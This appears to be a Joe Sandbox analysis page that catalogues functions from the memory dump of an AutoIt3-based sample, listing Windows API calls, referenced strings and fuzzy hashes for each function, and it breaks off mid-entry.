Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: fdb012c62e12db1663f4375e9e640746a473427a0b234e234122a6f86064025e
Instruction ID: 28e25b90c7bc09e0201e8f7856c7e4f6aada22f02d1c5df56e13161dc2a52abe
Opcode Fuzzy Hash: fdb012c62e12db1663f4375e9e640746a473427a0b234e234122a6f86064025e
Instruction Fuzzy Hash: 2B112B35501119EBCF10DF98D9859FE77F8EB05311F9008A6FA01E7150D734AA91DBA5

Function 00B71142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B6FCED,?,00B70D40,?,00008000), ref: 00B7115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B6FCED,?,00B70D40,?,00008000), ref: 00B71184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B6FCED,?,00B70D40,?,00008000), ref: 00B7118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00B6FCED,?,00B70D40,?,00008000), ref: 00B711C1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: e73bed14eb6e659c4ddcee7f85b435de83820607fd146ae2b90185d0fedee842
Instruction ID: 28b4c54f0d9f9ada135412881939079eaecc8856bf18e7e15c55dac8cd755508
Opcode Fuzzy Hash: e73bed14eb6e659c4ddcee7f85b435de83820607fd146ae2b90185d0fedee842
Instruction Fuzzy Hash: FC113C31D0052DD7CF009FADD988AEEBBB8FF09751F418496EA59BA280CB709550CBE5

Function 00B6D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B6D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B6D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B6D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B6D897

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 220451c16048e3d39667744fcd75b24087d3f3448cd1fc4113208fdf1073288e
Instruction ID: ba2cb52731df834d14340ece43336d52358616209d4ea6552424927398762091
Opcode Fuzzy Hash: 220451c16048e3d39667744fcd75b24087d3f3448cd1fc4113208fdf1073288e
Instruction Fuzzy Hash: DF118E71B01305DBE7208F50ED4CFA2BBFCEB00B10F5085AAA516D7180D7B4E9089FA1

Function 00B46FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00B46FDB

Part of subcall function 00B476C2: __fltout2.LIBCMT ref: 00B476EB

__cftog_l.LIBCMT ref: 00B47001
__cftoe_l.LIBCMT ref: 00B47033

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: d7fc18d5800d62930f561b0152066dba8bc6aeca91fac1348687025617e54297
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 01017E3208514ABBCF225E84DC41CED3FA2FB18350B498495FA1858130CB36CAB1FB81

Function 00B9B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B9B2E4
ScreenToClient.USER32(?,?), ref: 00B9B2FC
ScreenToClient.USER32(?,?), ref: 00B9B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B9B33B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 1def485198601d896ed2a6b17adf2430a46e369a66b2c67877a67df996cfa38b
Instruction ID: 64ef4b792589d25c580fc3e604a5897d09fe71fdff4b21da5664f9d4decfa105
Opcode Fuzzy Hash: 1def485198601d896ed2a6b17adf2430a46e369a66b2c67877a67df996cfa38b
Instruction Fuzzy Hash: 2A113475D0420AAFDF41CF99D5449EEBBF5FB08210F104166E914E3220D735AA55CF50

Function 00B9B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9B644
_memset.LIBCMT ref: 00B9B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BD6F20,00BD6F64), ref: 00B9B682
CloseHandle.KERNEL32 ref: 00B9B694

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 6fb49f78f8d70aa31781c9f462c80b3db67356b971b46a878b8250cffe2267b0
Instruction ID: 3f904171d70996fa98b5847066f63dfd25367a3e29c19d95c25d3003e7163465
Opcode Fuzzy Hash: 6fb49f78f8d70aa31781c9f462c80b3db67356b971b46a878b8250cffe2267b0
Instruction Fuzzy Hash: 88F05EB26417047AE2102765BC56FBBBB9CEB08395F004072FA08E6192EB755C0087A8

Function 00B76BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B76BE6

Part of subcall function 00B776C4: _memset.LIBCMT ref: 00B776F9

_memmove.LIBCMT ref: 00B76C09
_memset.LIBCMT ref: 00B76C16
LeaveCriticalSection.KERNEL32(?), ref: 00B76C26

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: e7dfd52c9a122d511ee454ccf63d8550541c0b4f3d0b3a42f6cea64a02175181
Instruction ID: 7a871a544939f9f505c9746938776ec987b8533b217a90aff3e1a3a891678886
Opcode Fuzzy Hash: e7dfd52c9a122d511ee454ccf63d8550541c0b4f3d0b3a42f6cea64a02175181
Instruction Fuzzy Hash: 29F0543A200100ABCF016F95DC85A4ABB69EF45321F14C0A1FE089F267CB31E811CBB4

Function 00B12218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B12231
SetTextColor.GDI32(?,000000FF), ref: 00B1223B
SetBkMode.GDI32(?,00000001), ref: 00B12250
GetStockObject.GDI32(00000005), ref: 00B12258
GetWindowDC.USER32(?,00000000), ref: 00B4BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B4BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00B4BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00B4BEC2
GetPixel.GDI32(00000000,?,?), ref: 00B4BEE2
ReleaseDC.USER32(?,00000000), ref: 00B4BEED

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 724094327dcc53caae8595d45e5646d34250de4b86219e11765b677f325435cd
Instruction ID: 3937494ff0842e99dbf48185479383bc07ef63aa7e5072a0327e8ed04cd0fb85
Opcode Fuzzy Hash: 724094327dcc53caae8595d45e5646d34250de4b86219e11765b677f325435cd
Instruction Fuzzy Hash: EAE03031104155AADF215F64ED0DBE83B50EB15332F1083A7FA69980E18B718590DB51

Function 00B68712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00B6871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00B682E6), ref: 00B68722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B682E6), ref: 00B6872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00B682E6), ref: 00B68736

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 17ecb380d9449644087e22c7e8f0835d22fcad846e8aaca40661598179264da4
Instruction ID: 120d32b9742f998a352ff8a4b94c06db6a0cb7ac7d83da8310cc713b2e9d1931
Opcode Fuzzy Hash: 17ecb380d9449644087e22c7e8f0835d22fcad846e8aaca40661598179264da4
Instruction Fuzzy Hash: 90E086376152129BD7205FB05E0DB763BACEF547A1F144869B249CB040DE788851C750

Function 00B6B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00B6B4BE

Strings

AutoIt3GUI, xrefs: 00B6B436
Container, xrefs: 00B6B43B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 743f8a278553008b45f8fde873bed1924cbaa4cd012ddceabc9611a211c3b8a5
Instruction ID: 25dcb0ea657f6a3925e6a3b394e3a0a6040c0a8b07662d393bb4dcd962c4b143
Opcode Fuzzy Hash: 743f8a278553008b45f8fde873bed1924cbaa4cd012ddceabc9611a211c3b8a5
Instruction Fuzzy Hash: 3D912771600601AFDB14DF64C894E6AB7F5FF49710F2085ADE94ACB3A1DB74E881CB50

Function 00B7AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FC86: _wcscpy.LIBCMT ref: 00B2FCA9

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

__wcsnicmp.LIBCMT ref: 00B7B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B7B0F6

Strings

LPT, xrefs: 00B7B027

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: de4b2b2f387cb9fa3cb12b4fffe03efce23be530914b3f87d314b05f80866df8
Instruction ID: 423ebaf949be22d47c1455f4334ea4cd32aff1f5d546a4c35bed4f5edadfee0d
Opcode Fuzzy Hash: de4b2b2f387cb9fa3cb12b4fffe03efce23be530914b3f87d314b05f80866df8
Instruction Fuzzy Hash: 9D615275A10215AFCB14EF54C895FAEB7F4EF08710F5080A9F92AAB251DB70AE84CF50

Function 00B22957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B22968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B22981

Strings

@, xrefs: 00B22975

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c81a8ece6d30be5f31dae857a5ee9944a186d1d511442c4332511a7259ef40a6
Instruction ID: 51df8c111cbad5ef23e990b7bea5b82fe731bb5af0bccfcec1faa739c1e5b0c3
Opcode Fuzzy Hash: c81a8ece6d30be5f31dae857a5ee9944a186d1d511442c4332511a7259ef40a6
Instruction Fuzzy Hash: 57514772408744ABD720EF10D886BEFBBE8FB85344F81889DF2D8410A1DF708569CB66

Function 00B79734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00B14F0B: __fread_nolock.LIBCMT ref: 00B14F29

_wcscmp.LIBCMT ref: 00B79824
_wcscmp.LIBCMT ref: 00B79837

Strings

FILE, xrefs: 00B79770

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 837b883cc378d0398ef10b4eebb8c0b16134eadeb7af7366811c18f444ef1666
Instruction ID: 158809fbe7f7630b76dae72fae05ea99717024d82fb60ec3913f8cc1eed17890
Opcode Fuzzy Hash: 837b883cc378d0398ef10b4eebb8c0b16134eadeb7af7366811c18f444ef1666
Instruction Fuzzy Hash: E241B571A00219BADF209EA4CC46FEFBBFDDF85710F4044A9F918B7181DB719A458B61

Function 00B8258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B8259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B825D4

Strings

|, xrefs: 00B825A5

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: c6c9219c9fb9fbfc1dac795e11ab0e8bc9abd2bb2ca94c90b26e1cd153401488
Instruction ID: d3db5e0fb167a820a29d1889deed7a7e14bdb78f385b38cd6536d199d69aed53
Opcode Fuzzy Hash: c6c9219c9fb9fbfc1dac795e11ab0e8bc9abd2bb2ca94c90b26e1cd153401488
Instruction Fuzzy Hash: AE31F771801119EBCF11EFA4CC85EEEBFB9FF08350F1000A9F915A6262EB315996DB60

Function 00B96A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B96B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B96B53

Strings

static, xrefs: 00B96AB3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 26d388156d369582d438933259f8897a2c0aa330c74cefee96adc1ed8ce646a9
Instruction ID: af83c581d30111ea2bd8b750f59eb4a4897a048887a5163321353cba77e28a92
Opcode Fuzzy Hash: 26d388156d369582d438933259f8897a2c0aa330c74cefee96adc1ed8ce646a9
Instruction Fuzzy Hash: 38318B71200604AEDF109F68CC91BFB73E9FF48760F50866AF9A9D7190DA30AC81CB60

Function 00B6994C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00B69965
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B6999F

Strings

@U=u, xrefs: 00B69965, 00B6999F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: ee0c9ee5c904c28fcfe17dff90116c266be0fa8f08994822000065f5eb6664f8
Instruction ID: 61dbe8df5c50f8aeb2317f5fcf692cd2832a6416053b1add568664328ba87906
Opcode Fuzzy Hash: ee0c9ee5c904c28fcfe17dff90116c266be0fa8f08994822000065f5eb6664f8
Instruction Fuzzy Hash: 0621D532D00205ABCF10EBA8C881DFEB7FDEF89750B0440A9F915A7290EE749C45C760

Function 00B728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B7294C

Strings

0, xrefs: 00B7290A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 1558d268d4361763aa6ca32322a4c32febb6e6d02db9ef9342c0833c691d66dd
Instruction ID: c0e2ce7fd82e6c9dd52484b52d597b375bb50d03e81bca11dc3c3657d140dbc3
Opcode Fuzzy Hash: 1558d268d4361763aa6ca32322a4c32febb6e6d02db9ef9342c0833c691d66dd
Instruction Fuzzy Hash: 1C31E631A003059FEB24DF58C985BAEBBF8EF45350F1880B9EAA9A61A0D7709940CB51

Function 00B839E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00B83A66

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Strings

, $, xrefs: 00B83AA6
AUTOITCALLVARIABLE%d, xrefs: 00B83A58

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 3ca07e78b04b1ff1902a89dbc3ecb8e9ec456be3cd6f8fe03c8d0201939aa22e
Instruction ID: f7238e544737a35869c6dd7235531d949015ee3d7156087e2e04eef82d12e446
Opcode Fuzzy Hash: 3ca07e78b04b1ff1902a89dbc3ecb8e9ec456be3cd6f8fe03c8d0201939aa22e
Instruction Fuzzy Hash: 0E218D31600219AACF14EF64CC82EEE77F9EF48B00F5004D8E545AB191DB34EA85CBA1

Function 00B6A9B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B26051

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B6AA10
_strlen.LIBCMT ref: 00B6AA1B

Strings

